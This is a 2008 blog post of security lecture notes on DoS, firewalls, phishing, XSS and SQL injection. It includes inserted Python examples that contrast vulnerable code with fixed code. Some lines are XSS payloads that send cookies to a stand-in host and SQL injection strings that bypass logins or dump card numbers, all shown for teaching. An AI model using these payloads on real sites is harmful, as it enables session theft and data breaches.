Tuesday, May 13, 2008

SEC520W2L1

Exploits - things that can go wrong


Five years ago it was script kiddies; now it is criminal activity, and things have really changed. Over the next few years it is going to change again.


The shift from operating-system attacks to application attacks: with applications you have many more variables than you do with the OS. There are many more applications and they all do different things. Operating systems are straightforward; applications are dynamic.


Attackers still go after the same things.

What is a DoS

CIA

Confidentiality,

Keep it secret

Integrity

The information you get from the data is what it should be. For instance, when you look at your bank account you want to know the numbers really are what is there.

What it should be, when it should be.

A lot of it is about who changed it and who is allowed to change it.

Identity: how do you prove someone is who they say they are?

Accessibility (availability)


Available when it is needed, in a timely fashion.

DoS denies accessibility.

DDoS – Distributed Denial of Service

One way is to break the software. Another common way is not to break the software at all but to overload or clog the pipe to it.

This is where DDoS and botnets come in: one central system controls many computers, and together they flood the service so that no one can access it.

Basic DoS has mostly been performed by kids in basements or unhappy employees. It has also been used for extortion: if shutting down your site costs you $30,000, that is a real problem, and it has been in some places.


Why is the web so vulnerable?

When it first came out everything was open, a kind of utopian world.

Robert Morris, the son of an internet pioneer, wrote a program to find out how many users were on the internet (thousands of them). It used the finger daemon: it would move itself onto a machine and do finger searches. He forgot to make it check whether it was already there; it was a naive thing, but he had written a program that invaded other people's computers.

Firewalls control what gets in and out. The first basic firewalls did packet filtering: look at each packet and at the port it is asking for. Suppose you have telnet inside on port 23, ssh on 22, http on 80 and so on. If you want telnet internally but not externally, telnet from outside gets stopped at the firewall. If you want the public to have access to your web server, you make them go through that one port only. You may open port 25 for mail, but you restrict traffic to the ports you want to get through and nothing else.
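A worked example of the port-based filtering described above, added here and not part of the lecture or of these notes: a toy first-hit packet filter in Python. The 10.0.0.0/8 internal range, the Packet and Rule types, the rule table and the sample packets are all assumptions made for the illustration.

```python
# Added example, not from the lecture notes: a toy first-hit packet filter in
# the style of the early port-based firewalls. The address range, the rule
# table and the packets are all constructed for illustration.
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

INTERNAL_NET = ip_network("10.0.0.0/8")  # assumed: the organisation's inside network


@dataclass(frozen=True)
class Packet:
    src: str       # source IP address
    dst: str       # destination IP address
    dport: int     # destination port, i.e. the service being asked for
    proto: str = "tcp"


@dataclass(frozen=True)
class Rule:
    action: str                  # "allow" or "deny"
    dport: Optional[int]         # None matches any port
    from_inside: Optional[bool]  # True: inside sources only, False: outside only, None: any
    proto: str = "tcp"


# The policy from the lecture: telnet (23) only from inside, ssh (22), the
# public web server (80) and mail (25) open to everyone, everything else closed.
RULES: List[Rule] = [
    Rule("allow", 23, from_inside=True),
    Rule("deny", 23, from_inside=False),
    Rule("allow", 22, from_inside=None),
    Rule("allow", 80, from_inside=None),
    Rule("allow", 25, from_inside=None),
]


def is_inside(addr: str) -> bool:
    return ip_address(addr) in INTERNAL_NET


def rule_matches(rule: Rule, pkt: Packet) -> bool:
    if rule.proto != pkt.proto:
        return False
    if rule.dport is not None and rule.dport != pkt.dport:
        return False
    if rule.from_inside is not None and rule.from_inside != is_inside(pkt.src):
        return False
    return True


def decide(pkt: Packet, rules: List[Rule] = RULES) -> str:
    """First matching rule wins; a packet that matches nothing is dropped (default deny)."""
    for rule in rules:
        if rule_matches(rule, pkt):
            return rule.action
    return "deny"


if __name__ == "__main__":
    samples = [
        Packet("10.1.2.3", "10.0.0.5", 23),       # telnet from inside: allowed
        Packet("203.0.113.7", "10.0.0.5", 23),    # telnet from outside: stopped
        Packet("203.0.113.7", "10.0.0.5", 80),    # public web server: allowed
        Packet("203.0.113.7", "10.0.0.5", 3306),  # a database port never opened: dropped
    ]
    for p in samples:
        print(f"{p.src} -> {p.dst}:{p.dport}/{p.proto}: {decide(p)}")
```

The four sample packets come out allow, deny, allow, deny. Note what the filter cannot see: once port 80 is open, everything the web server does with a request, including the queries it hands to a database behind it, is invisible to a port filter, which is the gap the rest of these notes is about. A filter like this is also stateless, so it cannot tell a reply to a connection started from inside apart from a fresh connection from outside; stateful firewalls came later for that.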


What happened once firewalls were in place: everyone started running a web server. Web servers would give you some documents; then the people who wrote web servers asked what if they could serve dynamic content or video, so they built more expansive web servers that create dynamic content.

Dynamic content is more accessible to the public. Then the firewall was opened up further: web services go through to MySQL and so on, it all gets more complex, and powerful, complex software has holes. The attacks changed with it and started aiming at the dynamic attributes of the server, not just HTTP. HTTP servers are common targets because they do so many things, and because they are complex they are perfect targets for running exploits. The exploits have moved more and more toward web browsers.


Embedded macros: a program inside a program. Web applications become a good target.

Email is a great target because of spam.

Media players are complex; YouTube.com is a vector to get into the system past the firewall.


On the server side, the OS, the security software itself, file management servers and database software become targets for attackers: get a corrupted version installed.


Also, things aimed at people: user rights, unauthorized devices.

Phishing: "your account is overdue, give us your password". It has all the right graphics, but it is false.

Spear phishing is when you target specific people. Then there are your laptop and USB keys; wireless is a great vector.

Instant messaging: easy pickings for careless users.



Zero-day attack: an attack the attackers know about and can mount before the vendor knows the weakness is there. Usually it happens with hacks where someone finds the weakness and posts it, and then the software vendor patches it.

Because we have sophisticated criminals before they use


Storm Worm,


Recognize trends

Talking about DoS

Another one: privilege escalation. It is like a user getting root access: you are some user on the system but you want to get higher.


Trying to get from out in the cloud, through a couple of servers, into the target: if the target sees outside traffic going into the system they have logs or an IDS, they can call your service provider, or the police come knocking.

So attackers break into something further away to get closer to the machine, trying to get other machines to do the work for them. This is slow, but it is how they work their way up to privilege escalation.






Common things, two you will see a lot of:

XSS - Cross Site Scripting

SQL Injection



Everyone is blogging, and websites let users put stuff in. Cross-site scripting is when you put data into a blog that changes how the page behaves for other people who view it. Think about it like this: someone goes to a site and looks at someone's blog. The big thing now is JavaScript, which embeds code in the web page; when the browser gets the page it runs that code. It lets code run on the client's machine, but evil stuff can get in that way too. With cross-site scripting, when you look at a wiki page or a blog there is script in it that is not visible to you but is executed by your browser.


A lot of sites and wikis check for this, but a sophisticated payload will often get through a filter.
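An added example, not from the lecture or from these notes, of the stored cross-site scripting scenario above and of why checking for it is hard: Python code that renders a blog comment three ways (pasted in raw, with a script-tag blacklist, and with HTML escaping). The comment strings, the payloads, the evil.example host and the contains_active_content() check are all constructed for the illustration.

```python
# Added example, not from the lecture notes: a stored-XSS scenario in a blog
# comment box, rendered three ways. All comments and payloads are constructed.
import re
from html import escape

# Constructed sample inputs a visitor might post to a blog or wiki.
BENIGN = "Nice post!"
SCRIPT_PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
NESTED_PAYLOAD = "<scr<script>ipt>alert(1)</script>"
EVENT_PAYLOAD = '<img src=x onerror="fetch(\'http://evil.example/?c=\'+document.cookie)">'


def render_naive(comment: str) -> str:
    """What the notes describe: user data dropped straight into the page."""
    return f'<div class="comment">{comment}</div>'


_SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)


def render_blacklist(comment: str) -> str:
    """A typical 'check': strip <script> tags and hope. It runs once, so a tag
    nested inside another survives, and it never looks at event attributes."""
    return render_naive(_SCRIPT_TAG.sub("", comment))


def render_escaped(comment: str) -> str:
    """Output encoding for an HTML text context: < > & " ' become entities, so
    the browser shows the payload as text instead of parsing it as markup."""
    return render_naive(escape(comment, quote=True))


_ACTIVE = re.compile(r"<script|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def contains_active_content(html: str) -> bool:
    """Crude stand-in for 'would the browser run something here': a real
    <script> tag, or a tag carrying an on* event handler. Illustration only."""
    return _ACTIVE.search(html) is not None


if __name__ == "__main__":
    cases = [("script", SCRIPT_PAYLOAD), ("nested", NESTED_PAYLOAD), ("event", EVENT_PAYLOAD)]
    for name, payload in cases:
        for renderer in (render_naive, render_blacklist, render_escaped):
            out = renderer(payload)
            print(f"{name:7s} {renderer.__name__:17s} active={contains_active_content(out)}  {out}")
```

The blacklist stops the obvious payload but not the nested `<scr<script>ipt>` one (stripping the inner tag leaves a working `<script>`) or the event-handler one, which is the "sophisticated stuff gets through" point. html.escape() makes all three inert because the browser never sees a tag at all. One caveat: escape() is the right encoder for text inside an HTML element; data going into an attribute value, a URL or a script block needs the encoder for that context.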


SQL injection: a web server sends queries to a database. Databases by nature hold a lot of data, so it is in an attacker's interest to get access to it.

If you design it right you use -T, because if your web server interacts with a database server and someone slips some SQL code into the data that gets sent to the database server, they can do bad things: get access, break integrity, do things they are not authorized to do, find credit card numbers.
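An added example, not from the lecture or from these notes, of the SQL injection described above: the query built by pasting user input into SQL text, beside the parameterised version, run against an in-memory SQLite database. The users, passwords, card numbers and attack strings are all constructed.

```python
# Added example, not from the lecture notes: the vulnerable query beside the
# parameterised one, run against an in-memory SQLite database. Users, card
# numbers and attack strings are constructed for illustration.
import sqlite3
from typing import List, Optional

CARD_NUMBERS = ["4111 1111 1111 1111", "5500 0000 0000 0004"]  # constructed, not real cards


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'correct horse'), ('bob', 'hunter2');
        CREATE TABLE cards (owner TEXT, number TEXT);
        """
    )
    conn.executemany("INSERT INTO cards VALUES (?, ?)", zip(["alice", "bob"], CARD_NUMBERS))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """User input pasted into the SQL text: the attacker's quote ends the string
    literal and the rest of the input is parsed as SQL."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Parameterised query: the driver sends the values separately from the SQL,
    so a quote in the input is just a quote inside a value."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[str]:
    """A 'find user' feature with the same flaw; a UNION lets the attacker read
    from a table the feature was never meant to touch (the cards)."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [r[0] for r in conn.execute(sql).fetchall()]


def lookup_safe(conn: sqlite3.Connection, username: str) -> List[str]:
    rows = conn.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    print("normal login:   ", login_vulnerable(db, "alice", "correct horse"))
    print("comment bypass: ", login_vulnerable(db, "alice' --", "wrong"))
    print("OR 1=1 bypass:  ", login_vulnerable(db, "x", "' OR '1'='1"))
    print("UNION dump:     ", lookup_vulnerable(db, "' UNION SELECT number FROM cards --"))
    print("safe, same input:", login_safe(db, "alice' --", "wrong"), lookup_safe(db, "' UNION SELECT number FROM cards --"))
```

With `alice' --` as the username the vulnerable query becomes `... WHERE username = 'alice' --' AND password = 'wrong'`, so the password check is commented out; the UNION string pulls the card numbers out through a feature that only ever meant to return usernames. The parameterised versions return nothing for the same input. sqlite3's execute() refuses more than one statement per call, so the stacked `'; DROP TABLE ...` form is not shown here, but many other drivers do allow it. The fix is the same either way: parameterise every query, and give the web application's database account only the rights it needs, so that even a successful injection cannot reach the cards table.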


DNS poisoning: put false entries into DNS, then collect the data that gets redirected to you.

Identity theft.

New devices for passwords: MLS and email passwords that are valid for only 30 seconds.


Assignment 1


WHOIS
GOOGLE
DNS Tools


CanadianISP.com

Take it, generate a report as a .pdf file, and you can upload it.
